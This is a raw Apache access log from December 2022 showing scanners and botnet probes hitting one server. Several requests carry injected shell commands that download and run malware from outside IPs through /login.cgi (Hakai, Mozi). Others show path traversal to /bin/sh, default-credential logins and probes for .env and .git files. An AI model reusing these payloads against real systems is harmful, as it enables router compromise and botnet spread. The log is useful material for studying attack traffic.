173.214.175.178 - - [05/Dec/2022:01:34:27 +0100] "CONNECT cloudflare.com:443 HTTP/1.1" 405 344 "-" "Go-http-client/1.1"
152.89.196.211 - - [05/Dec/2022:01:35:07 +0100] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
152.89.196.211 - - [05/Dec/2022:01:36:35 +0100] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
194.55.186.124 - - [05/Dec/2022:01:36:50 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.85:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
170.187.155.78 - - [05/Dec/2022:01:37:27 +0100] "HEAD / HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a3pre) Gecko/20070330"
170.187.155.78 - - [05/Dec/2022:01:37:51 +0100] "GET /nmaplowercheck1670200647 HTTP/1.1" 404 329 "-" "\"Mozilla/5.0"
170.187.155.78 - - [05/Dec/2022:01:37:51 +0100] "GET /evox/about HTTP/1.1" 404 315 "-" "\"Mozilla/5.0"
170.187.155.78 - - [05/Dec/2022:01:37:57 +0100] "GET /HNAP1 HTTP/1.1" 404 310 "-" "\"Mozilla/5.0"
170.187.155.78 - - [05/Dec/2022:01:38:27 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
152.89.196.211 - - [05/Dec/2022:01:38:59 +0100] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
18.135.97.29 - - [05/Dec/2022:01:39:02 +0100] "GET / HTTP/1.0" 200 1229 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
152.89.196.211 - - [05/Dec/2022:01:42:17 +0100] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
152.89.196.211 - - [05/Dec/2022:01:45:46 +0100] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
143.244.50.176 - - [05/Dec/2022:01:48:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
18.135.97.29 - - [05/Dec/2022:01:48:34 +0100] "GET / HTTP/1.0" 200 1229 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
152.89.196.211 - - [05/Dec/2022:01:49:23 +0100] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
183.136.225.32 - - [05/Dec/2022:01:50:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0"
143.244.50.176 - - [05/Dec/2022:01:50:13 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
152.89.196.211 - - [05/Dec/2022:01:51:48 +0100] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
194.55.186.124 - - [05/Dec/2022:01:52:59 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.84:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
183.136.225.32 - - [05/Dec/2022:01:55:51 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE"
183.136.225.32 - - [05/Dec/2022:01:56:18 +0100] "GET /robots.txt HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE"
18.135.97.29 - - [05/Dec/2022:01:58:06 +0100] "GET / HTTP/1.0" 200 1229 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
80.82.78.39 - - [05/Dec/2022:02:03:44 +0100] "GET /login.php HTTP/1.1" 404 314 "-" "Mozilla/5.0"
80.82.78.39 - - [05/Dec/2022:02:03:48 +0100] "\x16\x03\x01" 501 318 "-" "-"
84.21.172.205 - - [05/Dec/2022:02:04:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
18.135.97.29 - - [05/Dec/2022:02:07:39 +0100] "GET / HTTP/1.0" 200 1229 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
185.142.236.41 - - [05/Dec/2022:02:13:34 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
185.142.236.41 - - [05/Dec/2022:02:13:37 +0100] "GET /robots.txt HTTP/1.1" 404 315 "-" "-"
185.142.236.41 - - [05/Dec/2022:02:13:37 +0100] "GET /sitemap.xml HTTP/1.1" 404 316 "-" "-"
185.142.236.41 - - [05/Dec/2022:02:13:37 +0100] "GET /.well-known/security.txt HTTP/1.1" 404 329 "-" "-"
185.142.236.41 - - [05/Dec/2022:02:13:39 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0"
18.135.97.29 - - [05/Dec/2022:02:17:12 +0100] "GET / HTTP/1.0" 200 1229 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
141.255.166.2 - - [05/Dec/2022:02:19:22 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.87:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
141.255.166.2 - - [05/Dec/2022:02:21:36 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.89:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
141.255.166.2 - - [05/Dec/2022:02:22:08 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.84:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
141.255.166.2 - - [05/Dec/2022:02:23:49 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.80:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
200.58.80.108 - - [05/Dec/2022:02:27:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
141.255.166.2 - - [05/Dec/2022:02:28:43 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.81:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
165.232.112.153 - - [05/Dec/2022:02:28:47 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
84.21.172.128 - - [05/Dec/2022:02:29:15 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.87:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
123.5.181.211 - - [05/Dec/2022:02:31:42 +0100] "GET /boaform/admin/formLogin?username=admin&psd=admin HTTP/1.0" 404 324 "-" "-"
141.255.166.2 - - [05/Dec/2022:02:31:51 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.88:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
173.214.175.178 - - [05/Dec/2022:02:32:18 +0100] "CONNECT cloudflare.com:443 HTTP/1.1" 405 344 "-" "Go-http-client/1.1"
172.91.47.43 - - [05/Dec/2022:02:32:36 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
165.232.112.153 - - [05/Dec/2022:02:34:14 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
141.255.166.2 - - [05/Dec/2022:02:35:26 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.85:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
18.135.97.29 - - [05/Dec/2022:02:38:01 +0100] "\x16\x03\x01" 501 318 "-" "-"
18.135.97.29 - - [05/Dec/2022:02:38:08 +0100] "\x16\x03\x01" 501 318 "-" "-"
18.135.97.29 - - [05/Dec/2022:02:38:16 +0100] "\x16\x03\x01" 501 318 "-" "-"
18.135.97.29 - - [05/Dec/2022:02:38:24 +0100] "\x16\x03\x01" 501 318 "-" "-"
18.135.97.29 - - [05/Dec/2022:02:38:32 +0100] "\x16\x03\x01" 501 318 "-" "-"
18.135.97.29 - - [05/Dec/2022:02:38:37 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
18.135.97.29 - - [05/Dec/2022:02:38:42 +0100] "GET /manage/account/login HTTP/1.1" 404 325 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
141.255.166.2 - - [05/Dec/2022:02:38:45 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.83:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
152.89.196.211 - - [05/Dec/2022:02:38:45 +0100] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 333 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
18.135.97.29 - - [05/Dec/2022:02:39:04 +0100] "GET /index.html HTTP/1.1" 200 1229 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
152.89.196.211 - - [05/Dec/2022:02:39:11 +0100] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 333 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
41.157.228.144 - - [05/Dec/2022:02:40:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
152.89.196.211 - - [05/Dec/2022:02:41:32 +0100] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 333 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
152.89.196.211 - - [05/Dec/2022:02:42:08 +0100] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 333 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
152.89.196.211 - - [05/Dec/2022:02:42:16 +0100] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 333 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
152.89.196.211 - - [05/Dec/2022:02:42:33 +0100] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 333 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
152.89.196.211 - - [05/Dec/2022:02:42:49 +0100] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 333 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
195.9.32.54 - - [05/Dec/2022:02:43:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
111.118.40.97 - - [05/Dec/2022:02:43:31 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
152.89.196.211 - - [05/Dec/2022:02:43:41 +0100] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 333 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
152.89.196.211 - - [05/Dec/2022:02:44:40 +0100] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 333 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
152.89.196.211 - - [05/Dec/2022:02:44:57 +0100] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 333 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
141.255.166.2 - - [05/Dec/2022:02:47:31 +0100] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
47.88.6.178 - - [05/Dec/2022:02:47:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; Android 10; LIO-AN00 Build/HUAWEILIO-AN00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Mobile Safari/537.36"
47.254.85.182 - - [05/Dec/2022:02:47:55 +0100] "GET /Public/home/js/check.js HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Linux; Android 10; LIO-AN00 Build/HUAWEILIO-AN00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Mobile Safari/537.36"
47.88.101.3 - - [05/Dec/2022:02:47:56 +0100] "GET /static/admin/javascript/hetong.js HTTP/1.1" 404 338 "-" "Mozilla/5.0 (Linux; Android 10; LIO-AN00 Build/HUAWEILIO-AN00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Mobile Safari/537.36"
81.157.1.64 - - [05/Dec/2022:02:51:19 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://46.19.141.122/dlink%20-O%20-%3E%20/tmp/dlink;chmod%20777%20/tmp/dlink;sh%20/tmp/dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
194.55.186.124 - - [05/Dec/2022:02:51:30 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.80:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
141.255.166.2 - - [05/Dec/2022:02:53:05 +0100] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
180.188.232.120 - - [05/Dec/2022:02:54:00 +0100] "27;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0" 400 329 "-" "-"
141.255.166.2 - - [05/Dec/2022:02:56:28 +0100] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
141.255.166.2 - - [05/Dec/2022:02:59:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
141.255.166.2 - - [05/Dec/2022:02:59:52 +0100] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
80.82.78.39 - - [05/Dec/2022:02:59:59 +0100] "\x16\x03\x01" 501 318 "-" "-"
152.89.196.211 - - [05/Dec/2022:03:00:33 +0100] "GET /actuator/gateway/routes HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
194.55.186.124 - - [05/Dec/2022:03:04:09 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.82:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
152.89.196.211 - - [05/Dec/2022:03:06:01 +0100] "GET /actuator/gateway/routes HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
141.255.166.2 - - [05/Dec/2022:03:07:58 +0100] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
141.255.166.2 - - [05/Dec/2022:03:08:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
152.89.196.211 - - [05/Dec/2022:03:09:36 +0100] "GET /actuator/gateway/routes HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
141.255.166.2 - - [05/Dec/2022:03:09:39 +0100] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
65.21.206.43 - - [05/Dec/2022:03:10:10 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Edg/91.0.864.54"
141.255.166.2 - - [05/Dec/2022:03:10:29 +0100] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
141.255.166.2 - - [05/Dec/2022:03:11:22 +0100] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
152.89.196.211 - - [05/Dec/2022:03:13:00 +0100] "GET /actuator/gateway/routes HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
152.89.196.211 - - [05/Dec/2022:03:15:07 +0100] "GET /actuator/gateway/routes HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
103.178.192.254 - - [05/Dec/2022:03:19:35 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
117.215.233.102 - - [05/Dec/2022:03:20:16 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
152.89.196.211 - - [05/Dec/2022:03:20:16 +0100] "GET /actuator/gateway/routes HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
152.89.196.211 - - [05/Dec/2022:03:21:11 +0100] "GET /actuator/gateway/routes HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
152.89.196.211 - - [05/Dec/2022:03:23:53 +0100] "GET /actuator/gateway/routes HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
152.89.196.211 - - [05/Dec/2022:03:24:33 +0100] "GET /actuator/gateway/routes HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
152.89.196.211 - - [05/Dec/2022:03:25:59 +0100] "GET /actuator/gateway/routes HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
194.55.186.124 - - [05/Dec/2022:03:30:52 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.81:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.190.158.47 - - [05/Dec/2022:03:32:17 +0100] "GET / HTTP/1.1" 400 329 "-" "-"
64.62.197.79 - - [05/Dec/2022:03:41:37 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
64.62.197.77 - - [05/Dec/2022:03:45:00 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6 Safari/605.1.15"
159.223.81.45 - - [05/Dec/2022:03:48:37 +0100] "\x16\x03\x01" 501 318 "-" "-"
159.223.81.45 - - [05/Dec/2022:03:48:37 +0100] "\x16\x03\x01" 501 318 "-" "-"
159.223.81.45 - - [05/Dec/2022:03:48:37 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
178.62.221.40 - - [05/Dec/2022:03:49:37 +0100] "\x16\x03\x01" 501 318 "-" "-"
178.62.221.40 - - [05/Dec/2022:03:49:37 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
178.62.221.40 - - [05/Dec/2022:03:49:37 +0100] "HELP" 501 319 "-" "-"
178.62.221.40 - - [05/Dec/2022:03:49:37 +0100] "GET /telescope/requests HTTP/1.1" 404 323 "-" "Go-http-client/1.1"
178.62.221.40 - - [05/Dec/2022:03:49:37 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Go-http-client/1.1"
178.62.221.40 - - [05/Dec/2022:03:49:37 +0100] "GET /?rest_route=/wp/v2/users/ HTTP/1.1" 200 1229 "-" "Go-http-client/1.1"
178.62.221.40 - - [05/Dec/2022:03:49:37 +0100] "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application HTTP/1.1" 404 380 "-" "Go-http-client/1.1"
178.62.221.40 - - [05/Dec/2022:03:49:37 +0100] "PUT /api/v2/cmdb/system/admin/admin HTTP/1.1" 405 358 "-" "Report Runner"
178.62.221.40 - - [05/Dec/2022:03:49:37 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; Android 6.0; HTC One M9 Build/MRA800062) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.3562.98 Mobile Safari/537.3"
178.62.221.40 - - [05/Dec/2022:03:49:37 +0100] "GET /s/4383e2634323e21393e2231323/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties HTTP/1.1" 404 403 "-" "Go-http-client/1.1"
178.62.221.40 - - [05/Dec/2022:03:49:37 +0100] "GET /.git/config HTTP/1.1" 404 316 "-" "Go-http-client/1.1"
178.62.221.40 - - [05/Dec/2022:03:49:37 +0100] "GET /info.php HTTP/1.1" 404 313 "-" "Go-http-client/1.1"
178.62.221.40 - - [05/Dec/2022:03:49:37 +0100] "GET /.DS_Store HTTP/1.1" 404 314 "-" "Go-http-client/1.1"
178.62.221.40 - - [05/Dec/2022:03:49:37 +0100] "GET /debug/default/view?panel=config HTTP/1.1" 404 323 "-" "Go-http-client/1.1"
178.62.221.40 - - [05/Dec/2022:03:49:38 +0100] "GET /api/search?folderIds=0 HTTP/1.1" 404 315 "-" "Go-http-client/1.1"
178.62.221.40 - - [05/Dec/2022:03:49:38 +0100] "GET /v2/_catalog HTTP/1.1" 404 316 "-" "Go-http-client/1.1"
178.62.221.40 - - [05/Dec/2022:03:49:38 +0100] "GET /login.action HTTP/1.1" 404 317 "-" "Go-http-client/1.1"
178.62.221.40 - - [05/Dec/2022:03:49:38 +0100] "GET /config.json HTTP/1.1" 404 316 "-" "Go-http-client/1.1"
waterhorse.scan.leakix.org - - [05/Dec/2022:03:49:37 +0100] "GET /server-status HTTP/1.1" 403 322 "-" "Go-http-client/1.1"
178.62.221.40 - - [05/Dec/2022:03:49:38 +0100] "GET /about HTTP/1.1" 404 310 "-" "Go-http-client/1.1"
27.45.11.143 - - [05/Dec/2022:03:52:11 +0100] "POST /HNAP1/ HTTP/1.0" 404 311 "-" "-"
167.250.140.129 - - [05/Dec/2022:03:53:56 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
167.94.145.60 - - [05/Dec/2022:03:54:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
167.94.145.60 - - [05/Dec/2022:03:54:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.145.60 - - [05/Dec/2022:03:54:02 +0100] "PRI * HTTP/2.0" 400 329 "-" "-"
167.94.145.60 - - [05/Dec/2022:03:54:02 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
194.55.186.124 - - [05/Dec/2022:03:55:44 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.88:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
182.119.150.190 - - [05/Dec/2022:04:00:29 +0100] "GET /boaform/admin/formLogin?username=ec8&psd=ec8 HTTP/1.0" 404 324 "-" "-"
62.233.50.179 - - [05/Dec/2022:04:06:35 +0100] "\x03" 501 316 "-" "-"
62.233.50.179 - - [05/Dec/2022:04:06:35 +0100] "\x03" 501 316 "-" "-"
62.233.50.179 - - [05/Dec/2022:04:06:35 +0100] "\x03" 501 316 "-" "-"
62.233.50.179 - - [05/Dec/2022:04:06:35 +0100] "\x03" 501 316 "-" "-"
62.233.50.179 - - [05/Dec/2022:04:06:35 +0100] "\x03" 501 316 "-" "-"
62.233.50.179 - - [05/Dec/2022:04:06:36 +0100] "\x03" 501 316 "-" "-"
62.233.50.179 - - [05/Dec/2022:04:06:36 +0100] "\x03" 501 316 "-" "-"
62.233.50.179 - - [05/Dec/2022:04:06:36 +0100] "\x03" 501 316 "-" "-"
43.153.10.221 - - [05/Dec/2022:04:06:56 +0100] "GET / HTTP/1.1" 200 1229 "-" "curl/7.64.1"
87.236.176.94 - - [05/Dec/2022:04:09:28 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)"
193.47.61.121 - - [05/Dec/2022:04:11:25 +0100] "GET / HTTP/1.1" 200 1229 "http://212.91.246.87:80/left.html" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0"
59.98.191.77 - - [05/Dec/2022:04:18:39 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
59.98.191.77 - - [05/Dec/2022:04:18:39 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
59.98.191.77 - - [05/Dec/2022:04:18:39 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
92.118.39.78 - - [05/Dec/2022:04:26:06 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
